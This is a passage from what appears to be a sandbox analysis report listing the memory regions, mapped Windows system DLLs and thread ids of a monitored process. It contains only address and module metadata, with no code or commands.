entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 2778 start_va = 0x1460000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 2779 start_va = 0x14c0000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 2780 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 2781 start_va = 0x1530000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 2782 start_va = 0x1630000 end_va = 0x16effff entry_point = 0x1630000 region_type = mapped_file name = "KernelBase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" Region: id = 2783 start_va = 0x1700000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2784 start_va = 0x1720000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 2785 start_va = 0x1760000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 2786 start_va = 0x17b0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 2787 start_va = 0x1800000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2788 start_va = 0x1890000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 2789 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 2790 start_va = 0x1a90000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 2791 start_va = 0x1b50000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 2792 start_va = 0x1c50000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 2793 start_va = 0x2cb0000 end_va = 0x2ceffff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 2794 start_va = 0x2d90000 end_va = 0x2d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2795 start_va = 0x6e7e0000 end_va = 0x6e982fff entry_point = 0x6e7fe815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" Region: id = 2796 start_va = 0x6f710000 end_va = 0x6f715fff entry_point = 0x6f7114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" Region: id = 2797 start_va = 0x70d30000 end_va = 0x70d3cfff entry_point = 0x70d31375 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" Region: id = 2798 start_va = 0x72430000 end_va = 0x72441fff entry_point = 0x72433271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Region: id = 2799 start_va = 0x72450000 end_va = 0x7245cfff entry_point = 0x72452012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 2800 start_va = 0x72460000 end_va = 0x72464fff entry_point = 0x724615f6 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" Region: id = 2801 start_va = 0x72470000 end_va = 0x724a7fff entry_point = 0x7247990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 2802 start_va = 0x724b0000 end_va = 0x724d2fff entry_point = 0x724bc354 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" Region: id = 2803 start_va = 0x72bf0000 end_va = 0x72c17fff entry_point = 0x72bf3200 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" Region: id = 2804 start_va = 0x72c20000 end_va = 0x72c5dfff entry_point = 0x72c38fb4 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" Region: id = 2805 start_va = 0x72c80000 end_va = 0x72c86fff entry_point = 0x72c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 2806 start_va = 0x72c90000 end_va = 0x72cabfff entry_point = 0x72c9a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 2807 start_va = 0x72d20000 end_va = 0x72d2ffff entry_point = 0x72d21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" Region: id = 2808 start_va = 0x72d30000 end_va = 0x72e45fff entry_point = 0x72d31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" Region: id = 2809 start_va = 0x72f10000 end_va = 0x72f33fff entry_point = 0x72f166b6 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" Region: id = 2810 start_va = 0x731c0000 end_va = 0x7320efff entry_point = 0x731c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" Region: id = 2811 start_va = 0x73210000 end_va = 0x73267fff entry_point = 0x732113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" Region: id = 2812 start_va = 0x73c70000 end_va = 0x73c86fff entry_point = 0x73c71345 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" Region: id = 2813 start_va = 0x74010000 end_va = 0x74056fff entry_point = 0x740289f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" Region: id = 2814 start_va = 0x740a0000 end_va = 0x740b3fff entry_point = 0x740a1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" Region: id = 2815 start_va = 0x74560000 end_va = 0x7456efff entry_point = 0x7456125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" Region: id = 2816 start_va = 0x74570000 end_va = 0x7457efff entry_point = 0x745712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 2817 start_va = 0x74580000 end_va = 0x74588fff entry_point = 0x745815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Region: id = 2818 start_va = 0x74690000 end_va = 0x7469cfff entry_point = 0x746911e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 2819 start_va = 0x74b50000 end_va = 0x74c44fff entry_point = 0x74b60d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 2820 start_va = 0x74c50000 end_va = 0x74c61fff entry_point = 0x74c54795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" Region: id = 2821 start_va = 0x75290000 end_va = 0x75294fff entry_point = 0x752915df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 2822 start_va = 0x75340000 end_va = 0x75355fff entry_point = 0x75342061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" Region: id = 2823 start_va = 0x75360000 end_va = 0x75376fff entry_point = 0x75361c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 2824 start_va = 0x75450000 end_va = 0x75457fff entry_point = 0x754534d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 2825 start_va = 0x75460000 end_va = 0x7549cfff entry_point = 0x754610f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" Region: id = 2826 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 2827 start_va = 0x75600000 end_va = 0x75643fff entry_point = 0x756163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 2828 start_va = 0x75730000 end_va = 0x75735fff entry_point = 0x75731673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 2829 start_va = 0x75740000 end_va = 0x7577bfff entry_point = 0x7574145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 2830 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 2831 start_va = 0x75850000 end_va = 0x7587afff entry_point = 0x75851bfc region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" Region: id = 2832 start_va = 0x758b0000 end_va = 0x758c6fff entry_point = 0x758b3574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" Region: id = 2833 start_va = 0x75940000 end_va = 0x75981fff entry_point = 0x75941360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" Region: id = 2834 start_va = 0x75bc0000 end_va = 0x75bc7fff entry_point = 0x75bc10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 2835 start_va = 0x75be0000 end_va = 0x75bfafff entry_point = 0x75be93b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 2836 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 2837 start_va = 0x75c70000 end_va = 0x75c98fff entry_point = 0x75c76b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 2838 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 2839 start_va = 0x75cb0000 end_va = 0x75cbafff entry_point = 0x75cb1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 2840 start_va = 0x75d20000 end_va = 0x75d2bfff entry_point = 0x75d2238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 2841 start_va = 0x75d50000 end_va = 0x75e6cfff entry_point = 0x75d5158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 2842 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 2843 start_va = 0x75f80000 end_va = 0x75fa6fff entry_point = 0x75f858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 2844 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 2845 start_va = 0x75fd0000 end_va = 0x76004fff entry_point = 0x75fd145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 2846 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 2847 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 2848 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 2849 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 2850 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 2851 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 2852 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 2853 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 2854 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 2855 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 2856 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 2857 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 2858 start_va = 0x77ca0000 end_va = 0x77ca5fff entry_point = 0x77ca1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 2859 start_va = 0x77cb0000 end_va = 0x77cb4fff entry_point = 0x77cb1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 2860 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 2861 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 2862 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 2863 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 2864 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2865 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 2866 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 2867 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 2868 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 2869 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 2870 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 2871 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2872 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 2873 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2874 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 2875 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2876 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2877 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2878 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2879 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2880 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2881 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2882 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2883 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2884 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 248 os_tid = 0xac4 Thread: id = 249 os_tid = 0xa10 Thread: id = 250 os_tid = 0xa0c Thread: id = 251 os_tid = 0xa04 Thread: id = 252 os_tid = 0x924 Thread: id = 253 os_tid = 0x110 Thread: id = 254 os_tid = 0x724 Thread: id = 255 os_tid = 0x720 Thread: id = 256 os_tid = 0x71c Thread: id = 257 os_tid = 0x70c Thread: id = 258 os_tid = 0x6a4 Thread: id = 259 os_tid = 0x50c Thread: id = 260 os_tid = 0x508 Thread: id = 261 os_tid = 0x504 Thread: id = 262 os_tid = 0x4f8 Thread: id = 263 os_tid = 0x4ec Thread: id = 264 os_tid = 0x4e4 Thread: id = 265 os_tid = 0x4e0 Thread: id = 269 os_tid = 0xba4 Thread: id = 271 os_tid = 0xbc8